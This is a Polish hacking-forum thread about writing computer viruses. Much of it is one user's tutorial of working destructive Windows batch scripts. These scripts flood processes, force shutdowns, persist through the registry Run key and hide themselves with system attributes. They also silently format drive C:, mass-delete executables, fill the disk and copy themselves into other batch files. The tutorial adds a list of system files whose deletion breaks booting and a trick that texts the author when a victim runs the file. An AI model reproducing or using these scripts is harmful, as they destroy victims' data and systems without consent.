Tworzenie wirusów

[DarkAngel_on]

Mysle ze na wirach da sie zrobic, przyklad ktos umieszcza wira na serwku.Czeka az robal troche narozrabia, puzniej pisze ze napisal antywira upload u niego na stronce,oczywiscie odplatnie.
Wszystko jest jak najbardziej legalne bo po pierwsze jesli jest dobry,to go nie namierza.Antywirusa mozna przecierz napisac czyz nie
Jesli ktos pisze taka prace to moze przecierz na niej zarobic.Kolo sie zamyka,
Ciekawe czy wiekszosc wirosow nie jest wlasnie rozprowadzana w celach zarobkowych gdyz licencje dobrych programow do ich usuwania tez niemalo kosztuja. Po drugie firmy tez dobrze zaplaca za zabezpieczenie sie przed zlosliwymi robakami.
Sam sie kiedys zastanawialem czy to nie dobry sposob na szybka kase ale po pierwsze nie umiem programowac po drugie nie jest moim celem niszczenie komus sprzetu po trzecie choc w glowie mam pelno pomyslow na dobre wiry to nigdy ich nie zrealizuje raczej bede walczyl z nimi. Przyklad 2 lata przed pojawieniem sie rotkitow zastanawialem sie czy jest mozliwe stworzenie programu rezydentnego w pamieci kompa naszla mnie ta mysl gdyz przeciez kazde urzadzenie ma swoj adres i gdzies przeciesz musi byc przechowywne cale info o sprzecie...- stalo sie pojawily sie rotkity. Po drugie co sie stanie jesli skauje sie przez program czesc adresu przestanie istniec czyz nie ? itd to nie jest miejsce na takie rozwazania wiec zgodnie z reg. podejrzewam ze ten post zostanie usuniety Dobry bylby tez program rezydentny w kernelu i pamieci biosu ktory losowo co iles czasu zmienial by swoja nazwe i podgladalby uruchomiane aplikacje w kernelu ...itdTo sa tylko moje rozwarzania ale co do pomyslu na rezydenta to naprawde mialem taki dzial i bylem zaskoczony ze ktos go zrealizowal wiec widze ze duzo jest mozliwe jedyne co nas ogranicza to nasza niewiedza ....

[TQM]

... a to wszystko juz jest, istnieje, dziala i ma sie dobrze!
Wstrzykiwanie kodu do dzialajacego kernela... ukrywanie procesow, polaczen, itd. Znowu ktos Cie ubiegl...

[DarkAngel_on]

Chciałbym stworzyć wirusa który będzia miał jakies funkcje np . robi format lub robi zrzyty ekranu i wysyła na meila . Jaki język do tego polecacie ?

Od tego sie zaczyna a potem jest pelno zapytan typu mam wira jak go usunac...
co poniekturzy wysylaja takie robaczki , a potem jak ktos im odesle wersje wzbogacona to pisza """pomocy gosc mi wyslal wirusa a ja niewiem dlaczego mnie meczy """ jestem zarejestrowany jeszcze na innym forum i takich tekstow jest baardzo duzo // rotfll jesli pisze robaka a potem go rozsyla to niech sie nie zdziwi ze kiedys go ktos przywita przysylajac mu cos w prezencie w kernelu potem bedzie "POMOCY" ---gosc byl lepszy odemnie a ja niewiem jak usunac paczke ......
A co do pana panie od wirosow jesli pytasz o jezyk w jakim go napisac to wyglada na to ze niemasz bladego pojecia o programowaniu proponuje wiec jezyk migowy //rotfll moze byc tez francuski polecam dozwolone od lat 18 stu

[GSG-9]

facet uzywaj znakow przystankowych kk?
gadasz na innych, a sam nie jestes lepszy...

[DarkAngel_on]

Mam prośbę... zejdz ze mnie- jeśli nie podoba się tobie w jaki sposób pisze, nie musisz tego czytać.
To tyle.

Pozdrawiam DarkAngel

[DarkAngel_on]

Masz racje, ale mam jeszcze inne pomysły które nikt mi nie zawinie.Zrealizuje je, dopiero jak zrozumie jak je napisać... Zamieszczę wtedy coś z kodu, ale nie cały gdyż nie będę dawał komuś gnata do reki... a teraz, wracam do lektury.

[tom]

DarkAngel_on tak czytam twoje wypowiedzi i mam z tego niezly ubaw

Wiekszosc trikow byla uzywana juz za czasow dos-a (wtedy pisalem w asmie swoje pierwsze wirusy), obecnie kernel mode itp. to tylko implementacje zwiazane z systemem operacyjnym.

Dawne wirusy tak samo staraly sie dosc mocno ukryc w systemie, przechwytujac przerwania, uzywajac nieudokumentowanych funkcji itd. Tak samo niektore (o ile dobrze pamietam "stoned") potrafily zaczaic sie w pamieci i przetrwac formatowanie dysku.

Trikow bylo jeszcze wiecej ale trudno tutaj je wymienic. Jesli chodzi o zarabianie na wirusach to jakis absurd. Znam wiele osob ktore dawno temu pisaly wirusy, jednak najczesciej powod byl prosty. Ot ciekawosc czy sie potrafi cos takiego napisac.

Teraz mozliwosci jest jeszcze wiecej, a ograniczeniem jest tylko fantazja programisty...

[⌂⌂⌂]

http://hack.pl/aktualnosci/przeglad_..._artykulu_1043

[.:Punk:.]

Rozumiem że nieznasz języków na tyle dobrze żeny napisać dobrego wirka ale nie musisz ....


nie doceniacie potęgi mocy (notatnika) jednym słowem DOS :

Krótki Poradnik:
1. Tworzenie pliku "bat"
Pliki bat tworzymy w notatniku , otwieramy notatnik wpisujemy pewne polecenia ( o nich później)
i zapisujemy z rozszerzeniem bat np. nazwa.bat .

2. Polecenia
-------------------
@echo off
start www.onet.pl
------------------
Powyższy programik otwiera nam stronę onet.pl można po start wpisać co chcemy np
start cos.bat otwiera plik cos.bat
start gg.exe otwiera komunikator gg


A teraz coś do wkurzenia
----------------
@echo off
:start
start notepad.exe
start.cmd.exe
goto start
-----------
Ten programik działa podobnie jak powszedni otwiera notatnik i wiersz polecenia
ale najlepsze w nim jest to :

@echo off
:start to jest tak jakby znacznikiem dla programu do których funkcji ma wrócić
start notepad.exe
start.cmd.exe
goto start goto start to jest tu najważniejsze gdy program otworzy notatnik i wiersz poleceń wraca to do
:start i znowu otwiera notatnik i wiersz poleceń i tak bez końca w minutę mamy otwartych ponad 600 procesów
----------------------
shutdown.exe -s -t 600 -c "ha ha ha"
----------------------
ta komenda zamyka nam system Windows po 10 minutach
-s oznacza wyłączenie komputera
-t mówi po jakim czasie ma być zamknięty komputer czas jest podawany w sekundach
-c mówi jaki komunikat ma byc wyświetlony przy wyłączaniu komputera
zamiast -s możemy dać
-r restartuje komputer
-l wylogowuje użytkownika

teraz dodajmy to do autostartu żeby przy każdym uruchomieniu komp sie wyłączał
---------------
shutdown.exe -s -t 600

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul
i zapisujemy to jako wirus.bat tak jak podaliśmy. Dodany wpis do rejestru będzie uruchamiał
wirusa przy każdym włączeniu kompa

można zamknięcie systemu wyłączyć tą komendom :
---------------------
shutdown.exe -a
--------------------------
-------------------------
@echo off
echo T | format c: /q
cls
-------------------------------

to polecenie formatuje nam dysk C: w trybie szybkim i bez potwierdzenia
T | ( system pyta czy na pewno chcemy sformatować dysk C ten kawałek odpowiada za nas twierdząco
cls czyści ekran żeby użytkownik nie wiedział że coś sie W ogule usuwa
| ten znacznik tworzymy kombinacją klawiszy shift + \


Możemy nadać też naszemu wirusowi atrybuty systemowe
np nie Będzie widoczny nawet gdy mamy załączoną opcje
pokaż pliki ukryte
------------------------------------------
ATTRIB +S +H +R wirus.bat
-------------------------------------------
Atrybuty te możemy nadać każdemu plikowi wystarczy podać jego nazwę tak jak my podaliśmy nazwę naszego wirusa „wirus.bat”. Możemy je również zdjąć zamiast + wpiszmy - i zdejmiemy z określonego pliku atrybuty systemowe


Opóźnienie czasowe
możemy sprawić by jakaś komenda lub program uruchomiła się po konkretnym czasie

@echo off
PING -n 60 127.0.0.1 >nul
start cos.cos
po -n wpisujemy liczbę sekund tu jest np 60
po tym wpisujemy co ma sie uruchomić

tearaz jakiś wirusik
--------------------------------
@echo off
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
PING -n 2 127.0.0.1 >nul
start cmd.exe
start cmd.exe
shutdown.exe -s -t 15

@echo off
copy %0 C:\wirus.bat
@echo REGEDIT4 >>a.reg
@echo. >>a.reg
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] >>a.reg
@echo "win.sys"="C:\\wirus.bat" >>a.reg
@echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg >nul

ATTRIB +S +H +R +A wirus.bat

--------------------------------------


Ten wirus otwiera najpierw co 2 sekundy dwa razy wiersz polecenia
otworzy ich łącznie 8 po tym uruchamia wyłączenie kompa po 15 sekundach
dopisuje się do rejestru i nadaje sobie atrybuty pliku systemowego czyli użytkownik go nie widzi
--------------------
del *exe* /s /q
--------------------
usuwa wszystkie pliki exe w trybie szybkim można zamiast exe postawić kropkę wtedy usunie wszystkie pliki
w folderze w którym sie znajduje lub z dysku albo podać jakąś nazwę pliku np. dokument.txt i usunie tylko ten plik
Pamiętajcie ze del tutaj jest spacja *exe* tutaj jest spacja /s tutaj też jest spacja /q

---------------------------------------------------------------------------------------

@echo off
regedit /e ksyf
:start
cls
type ksyf >> c:windowssystem32syf.dll
goto start
-----------------------------------------------------------------------------------
ten bat zapełnia dysk

Mówią że wirusy bat nie potrafią się rozmnażać w jednym artykule o nich znalazłem coś co powinno was zaciekawić
--------------------------------------------------------------------
@echo off
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul
--------------------------------------------------------------------
To jest sposób na doklejanie się do innego pliku bat.

----------------------------
type %0 >>inny.bat

----------------------------
Zamazywanie innego pliku bat swoim kodem

Nie wiem czy te przykłady działają nie sprawdzałem ich na swoim komputerze.

Dałem tu listę ważnych plików systemowych po których usunięciu system się nie uruchomi

C:\COMMAND.COM
C:\IO.SYS
C:\MSDOS.SYS
C:\WINDOWS\WIN.COM
C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
C:\WINDOWS\SYSTEM\VMM32.VXD
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM.INI





a teraz na dokładkę kilka komend
uruchamiamy je w formacie
@echo off
start i tu komenda
(nie rozczarujecie się, nie wszystkie działają w Windows XP)

user,exitwindows - zakończenie pracy Windows
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)
user,enableoemlayer - włącza grafikę Windows
user,repaintscreen - odświeża ekran [F5]
user,setcursorpos - kursor myszki leci w lewy-górny róg
user,tilechildwindows - ustawia okna w rzędzie
user,cascadechildwindows - odwrotność powyższego
user,swapmousebutton - zamienia klawisze myszki
user,setcareblinktime [n] - szybkość migania kursora
user,setdoubleckilcktime [n] - szybkość dwukliku
user.exe,MessageBeep - małe piknięcie
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)
mouse,disable - blokada myszki
keyboard,disable - blokada klawiatury
shell,shellexecute - otwiera okno explorera
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...
shell32,SHFormatDrive - okno dialogowe Formatuj
shell32,ShellAboutA - info o pamięci fizycznej i zasobach
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)
shell32,SHexitWindowsEX 2 - restartuje Windows
shell32,SHexitWindowsEX 3 - restartuje powloke Windows
shell32,Control_RunDLL - otwiera Panel Sterowania
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury
shell32,Control_RunDLL main.cpl @3 - okno drukarek
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów
shell32,Control_RunDLL findfast.cpl - okno Find Fastu


Poradnik z mojego forum :

www.hackit.fora.pl

Już masz odpowiedź jak napisać wirusa można zamknąć temat

aa i można jeszcze zrobić coś takiego że jak ofiara kliknie w wirka to ty dostaniesz smsa

c:\progra~1\gadu-gadu\gg.exe /send:"nr telefonu" /msg:"text"


-------------------

del - usuwa plik
copy - wiadomo
cls - czysci ekran
dir - wyswietla liste plikow i katalogow
echo - "wyswietla komunikaty lub wlacza i wylacza echo polecen"
exit - konczy dzialanie programu
find - wyszukuje ciag tekstowy w pliku lub plikach
findstr - wyszukuje ciagi znakow w plikach
format - formatuje dysk
goto - wykonuje skok do danej etykiety
md - tworzy katalog
pause - noo zatrzymuje dzialanie programu i czeka az uzytkownik nacisnie
jakis klawisz Smile (wyswietla komunikat - Aby kontynuowac nacisnij dowolny
klawisz ..)
pause >> null - to co powyzej ale bez komunikatu (stdout jest przekierowane
w nicosc Wink )
rd - usuwa katalog
ren - zmienia nazwe pliku
start - uruchamia program lub polecenie w osobnym oknie
time - wyswietla lub ustawia ( Razz ) czas systemowy
xcopy - kopiuje pliki i katalogi



jeszcze jedna przydatna rzecz jak chcemy żeby po wykonaniu zadania plik sam się skasował na końcu dodajemy:

del %0

[Laik707]

@Punk
bath to potężne narzędzie tylko niedoceniane.

A propos zarabiania, a spamerzy, botnety i przechwytywanie preferencji userów to co. Złote informacje dla speców od marketingu.
Niestety spam jest wszędzie, bilbordy, reklamy w TV, radio i necie.
Czasem chce się rzygać.